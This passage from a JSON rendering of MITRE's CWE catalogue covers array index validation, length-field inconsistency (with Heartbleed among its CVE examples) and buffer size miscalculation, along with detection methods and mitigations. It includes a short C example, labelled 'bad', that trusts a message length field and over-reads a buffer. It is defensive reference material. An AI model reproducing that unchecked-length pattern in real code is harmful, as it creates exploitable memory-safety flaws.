maximum number, which can lead to resultant array index overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1189"},{"Reference":"CVE-2007-5756","Description":"Chain: device driver for packet-capturing software allows access to an unintended IOCTL with resultant array index error.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5756"},{"Reference":"CVE-2005-2456","Description":"Chain: array index error (CWE-129) leads to deadlock (CWE-833)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2456"}]},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Unchecked array indexing"},{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"INDEX - Array index overflow"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR00-C","Entry_Name":"Understand how arrays work"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR30-C","Entry_Name":"Do not form or use out-of-bounds pointers or array subscripts","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR38-C","Entry_Name":"Do not add or subtract an integer to a pointer if the resulting value does not refer to a valid array element"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT32-C","Entry_Name":"Ensure that operations on signed integers do not result in overflow"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"IDS32-PL","Entry_Name":"Validate any integer that is used as an array index","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-129"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"100"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 5, &#34;Array Indexing Errors&#34; Page 144"}},{"attr":{"@_External_Reference_ID":"REF-96"}},{"attr":{"@_External_Reference_ID":"REF-58"}},{"attr":{"@_External_Reference_ID":"REF-60"}},{"attr":{"@_External_Reference_ID":"REF-61"}},{"attr":{"@_External_Reference_ID":"REF-76"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 5: Buffer Overruns.&#34; Page 89"}},{"attr":{"@_External_Reference_ID":"REF-64"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-129"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Notes":{"Note":[{"#text":"This weakness can precede uncontrolled memory allocation (CWE-789) in languages that automatically expand an array when an index is used that is larger than the size of the array, such as JavaScript.","attr":{"@_Type":"Relationship"}},{"#text":"An improperly validated array index might lead directly to the always-incorrect behavior of \\"access of array using out-of-bounds index.\\"","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Observed_Examples, Other_Notes, Potential_Mitigations, Theoretical_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Detection_Factors, Likelihood_of_Exploit, Potential_Mitigations, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Unchecked Array Indexing","attr":{"@_Date":"2009-10-29"}}}},"130":{"attr":{"@_ID":"130","@_Name":"Improper Handling of Length Parameter Inconsistency","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software parses a formatted message or structure, but it does not handle or incorrectly handles a length field that is inconsistent with the actual length of the associated data.","Extended_Description":"If an attacker can manipulate the length parameter associated with an input such that it is inconsistent with the actual length of the input, this can be leveraged to cause the target application to behave in unexpected, and possibly, malicious ways. One of the possible motives for doing so is to pass in arbitrarily large input to the application. Another possible motivation is the modification of application state by including invalid data for subsequent properties of the application. Such weaknesses commonly lead to attacks such as buffer overflows and execution of arbitrary code.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"240","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"805","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"C++","@_Prevalence":"Sometimes"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":[{"Term":"length manipulation"},{"Term":"length tampering"}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Memory","Modify Memory","Varies by Context"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"When processing structured incoming data containing a size field followed by raw data, ensure that you identify and resolve any inconsistencies between the size field and the actual size of the data."},{"Phase":"Implementation","Description":"Do not let the user control the size of the buffer."},{"Phase":"Implementation","Description":"Validate that the length of the user-supplied data is consistent with the buffer size."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-91"},"Intro_Text":"In the following C/C++ example the method processMessageFromSocket() will get a message from a socket, placed into a buffer, and will parse the contents of the buffer into a structure that contains the message length and the message body. A for loop is used to copy the message body into a local character string which will be passed to another method for processing.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int processMessageFromSocket(int socket) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int success;char buffer[BUFFER_SIZE];char message[MESSAGE_SIZE];if (getMessage(socket, buffer, BUFFER_SIZE) &gt; 0) {}return success;","xhtml:br":["","","","","","","","",""],"xhtml:i":["// get message from socket and store into buffer","//Ignoring possibliity that buffer &gt; BUFFER_SIZE"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"ExMessage *msg = recastBuffer(buffer);int index;for (index = 0; index &lt; msg-&gt;msgLength; index++) {}message[index] = \'\\\\0\';success = processMessage(message);","xhtml:br":["","","","","","","","","",""],"xhtml:i":["// place contents of the buffer into message structure","// copy message body into string for processing","// process message"],"xhtml:div":{"#text":"message[index] = msg-&gt;msgBody[index];","attr":{"@_style":"margin-left:10px;"}}}}}}}},"Body_Text":"However, the message length variable from the structure is used as the condition for ending the for loop without validating that the message length variable accurately reflects the length of the message body (CWE-606). This can result in a buffer over-read (CWE-125) by reading from memory beyond the bounds of the buffer if the message length variable indicates a length that is longer than the size of a message body (CWE-130)."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2014-0160","Description":"Chain: \\"Heartbleed\\" bug receives an inconsistent length parameter (CWE-130) enabling an out-of-bounds read (CWE-126), returning memory that could include private cryptographic keys and other sensitive data.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160"},{"Reference":"CVE-2009-2299","Description":"Web application firewall consumes excessive memory when an HTTP request contains a large Content-Length value but no POST data.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2299"},{"Reference":"CVE-2001-0825","Description":"Buffer overflow in internal string handling routine allows remote attackers to execute arbitrary commands via a length argument of zero or less, which disables the length check.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0825"},{"Reference":"CVE-2001-1186","Description":"Web server allows remote attackers to cause a denial of service via an HTTP request with a content-length value that is larger than the size of the request, which prevents server from timing out the connection.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1186"},{"Reference":"CVE-2001-0191","Description":"Service does not properly check the specified length of a cookie, which allows remote attackers to execute arbitrary commands via a buffer overflow, or brute force authentication by using a short cookie length.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0191"},{"Reference":"CVE-2003-0429","Description":"Traffic analyzer allows remote attackers to cause a denial of service and possibly execute arbitrary code via invalid IPv4 or IPv6 prefix lengths, possibly triggering a buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0429"},{"Reference":"CVE-2000-0655","Description":"Chat client allows remote attackers to cause a denial of service or execute arbitrary commands via a JPEG image containing a comment with an illegal field length of 1.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0655"},{"Reference":"CVE-2004-0492","Description":"Server allows remote attackers to cause a denial of service and possibly execute arbitrary code via a negative Content-Length HTTP header field causing a heap-based buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0492"},{"Reference":"CVE-2004-0201","Description":"Help program allows remote attackers to execute arbitrary commands via a heap-based buffer overflow caused by a .CHM file with a large length field","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0201"},{"Reference":"CVE-2003-0825","Description":"Name services does not properly validate the length of certain packets, which allows attackers to cause a denial of service and possibly execute arbitrary code. Can overlap zero-length issues","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0825"},{"Reference":"CVE-2004-0095","Description":"Policy manager allows remote attackers to cause a denial of service (memory consumption and crash) and possibly execute arbitrary code via an HTTP POST request with an invalid Content-Length value.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0095"},{"Reference":"CVE-2004-0826","Description":"Heap-based buffer overflow in library allows remote attackers to execute arbitrary code via a modified record length field in an SSLv2 client hello message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0826"},{"Reference":"CVE-2004-0808","Description":"When domain logons are enabled, server allows remote attackers to cause a denial of service via a SAM_UAS_CHANGE request with a length value that is larger than the number of structures that are provided.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0808"},{"Reference":"CVE-2002-1357","Description":"Multiple SSH2 servers and clients do not properly handle packets or data elements with incorrect length specifiers, which may allow remote attackers to cause a denial of service or possibly execute arbitrary code.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1357"},{"Reference":"CVE-2004-0774","Description":"Server allows remote attackers to cause a denial of service (CPU and memory exhaustion) via a POST request with a Content-Length header set to -1.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0774"},{"Reference":"CVE-2004-0989","Description":"Multiple buffer overflows in xml library that may allow remote attackers to execute arbitrary code via long URLs.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0989"},{"Reference":"CVE-2004-0568","Description":"Application does not properly validate the length of a value that is saved in a session file, which allows remote attackers to execute arbitrary code via a malicious session file (.ht), web site, or Telnet URL contained in an e-mail message, triggering a buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0568"},{"Reference":"CVE-2003-0327","Description":"Server allows remote attackers to cause a denial of service via a remote password array with an invalid length, which triggers a heap-based buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0327"},{"Reference":"CVE-2003-0345","Description":"Product allows remote attackers to cause a denial of service and possibly execute arbitrary code via an SMB packet that specifies a smaller buffer length than is required.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0345"},{"Reference":"CVE-2004-0430","Description":"Server allows remote attackers to execute arbitrary code via a LoginExt packet for a Cleartext Password User Authentication Method (UAM) request with a PathName argument that includes an AFPName type string that is longer than the associated length field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0430"},{"Reference":"CVE-2005-0064","Description":"PDF viewer allows remote attackers to execute arbitrary code via a PDF file with a large /Encrypt /Length keyLength value.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0064"},{"Reference":"CVE-2004-0413","Description":"SVN client trusts the length field of SVN protocol URL strings, which allows remote attackers to cause a denial of service and possibly execute arbitrary code via an integer overflow that leads to a heap-based buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0413"},{"Reference":"CVE-2004-0940","Description":"Is effectively an accidental double increment of a counter that prevents a length check conditional from exiting a loop.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0940"},{"Reference":"CVE-2002-1235","Description":"Length field of a request not verified.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1235"},{"Reference":"CVE-2005-3184","Description":"Buffer overflow by modifying a length value.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3184"},{"Reference":"SECUNIA:18747","Description":"Length field inconsistency crashes cell phone.","Link":"http://secunia.com/advisories/18747/"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Length Parameter Inconsistency"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"47"}}},"Notes":{"Note":{"#text":"This probably overlaps other categories including zero-length issues.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Description, Name, Relationships, Observed_Example, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Description, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Length Parameter Inconsistency","attr":{"@_Date":"2008-09-09"}},{"#text":"Failure to Handle Length Parameter Inconsistency","attr":{"@_Date":"2009-03-10"}}]}},"131":{"attr":{"@_ID":"131","@_Name":"Incorrect Calculation of Buffer Size","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not correctly calculate the size to be used when allocating a buffer, which could lead to a buffer overflow.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"119","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability","Confidentiality"],"Impact":["DoS: Crash, Exit, or Restart","Execute Unauthorized Code or Commands","Read Memory","Modify Memory"],"Note":"If the incorrect calculation is used in the context of memory allocation, then the software may create a buffer that is smaller or larger than expected. If the allocated buffer is smaller than expected, this could lead to an out-of-bounds read or write (CWE-119), possibly causing a crash, allowing arbitrary code execution, or exposing sensitive data."}},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-1"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.","Automated static analysis generally does not account for environmental considerations when reporting potential errors in buffer calculations. This can make it difficult for users to determine which warnings should be investigated first. For example, an analysis tool might report buffer overflows that originate from command line arguments in a program that is not expected to run with setuid or other special privileges."]},"Effectiveness":"High","Effectiveness_Notes":"Detection techniques for buffer-related errors are more mature than for most other weakness types."},{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":"This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results.","Effectiveness":"Moderate","Effectiveness_Notes":"Without visibility into the code, black box methods may not be able to sufficiently distinguish this weakness from others, requiring follow-up manual methods to diagnose the underlying problem."},{"attr":{"@_Detection_Method_ID":"DM-9"},"Method":"Manual Analysis","Description":"Manual analysis can be useful for finding this weakness, but it might not achieve desired code coverage within limited time constraints. This becomes difficult for weaknesses that must be considered for all inputs, since the attack surface can be too large."},{"attr":{"@_Detection_Method_ID":"DM-7"},"Method":"Manual Analysis","Description":{"xhtml:p":["This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Specifically, manual static analysis is useful for evaluating the correctness of allocation calculations. This can be useful for detecting overflow conditions (CWE-190) or similar weaknesses that might have serious security impacts on the program."]},"Effectiveness":"High","Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Source Code Quality Analyzer"}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"When allocating a buffer for the purpose of transforming, converting, or encoding an input, allocate enough memory to handle the largest possible encoding. For example, in a routine that converts \\"&amp;\\" characters to \\"&amp;amp;\\" for HTML entity encoding, the output buffer needs to be at least 5 times as large as the input buffer."},{"attr":{"@_Mitigation_ID":"MIT-36"},"Phase":"Implementation","Description":{"xhtml:p":["Understand the programming language\'s underlying representation and how it interacts with numeric calculation (CWE-681). Pay close attention to byte size discrepancies, precision, signed/unsigned distinctions, truncation, conversion and casting between types, \\"not-a-number\\" calculations, and how the language handles numbers that are too large or too small for its underlying representation. [REF-7]","Also be careful to account for 32-bit, 64-bit, and other potential differences that may affect the numeric representation."]}},{"attr":{"@_Mitigation_ID":"MIT-8"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Perform input validation on any numeric input by ensuring that it is within the expected range. Enforce that the input meets both the minimum and maximum requirements for the expected range."},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"Phase":"Implementation","Description":"When processing structured incoming data containing a size field followed by raw data, identify and resolve any inconsistencies between the size field and the actual size of the data (CWE-130)."},{"Phase":"Implementation","Description":"When allocating memory that uses sentinels to mark the end of a data structure - such as NUL bytes in strings - make sure you also include the sentinel in your calculation of the total amount of memory that must be allocated."},{"attr":{"@_Mitigation_ID":"MIT-13"},"Phase":"Implementation","Description":"Replace unbounded copy functions with analogous functions that support length arguments, such as strcpy with strncpy. Create these if they are not available.","Effectiveness":"Moderate","Effectiveness_Notes":"This approach is still susceptible to calculation errors, including issues such as off-by-one errors (CWE-193) and incorrectly calculating buffer lengths (CWE-131). Additionally, this only addresses potential overflow issues. Resource consumption / exhaustion issues are still possible."},{"Phase":"Implementation","Description":"Use sizeof() on the appropriate data type to avoid CWE-467."},{"Phase":"Implementation","Description":"Use the appropriate type for the desired action. For example, in C/C++, only use unsigned types for values that could never be negative, such as height, width, or other numbers related to quantity. This will simplify validation and will reduce surprises related to unexpected casting."},{"attr":{"@_Mitigation_ID":"MIT-4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","Use libraries or frameworks that make it easier to handle numbers without unexpected consequences, or buffer allocation routines that automatically track buffer size.","Examples include safe integer handling packages such as SafeInt (C++) or IntegerLib (C or C++). [REF-106]"]}},{"attr":{"@_Mitigation_ID":"MIT-10"},"Phase":"Build and Compilation","Strategy":"Compilation or Build Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that automatically provide a protection mechanism that mitigates or eliminates buffer overflows.","For example, certain compilers and extensions provide automatic buffer overflow detection mechanisms that are built into the compiled code. Examples include the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not necessarily a complete solution, since these mechanisms can only detect certain types of overflows. In addition, an attack could still cause a denial of service, since the typical response is to exit the 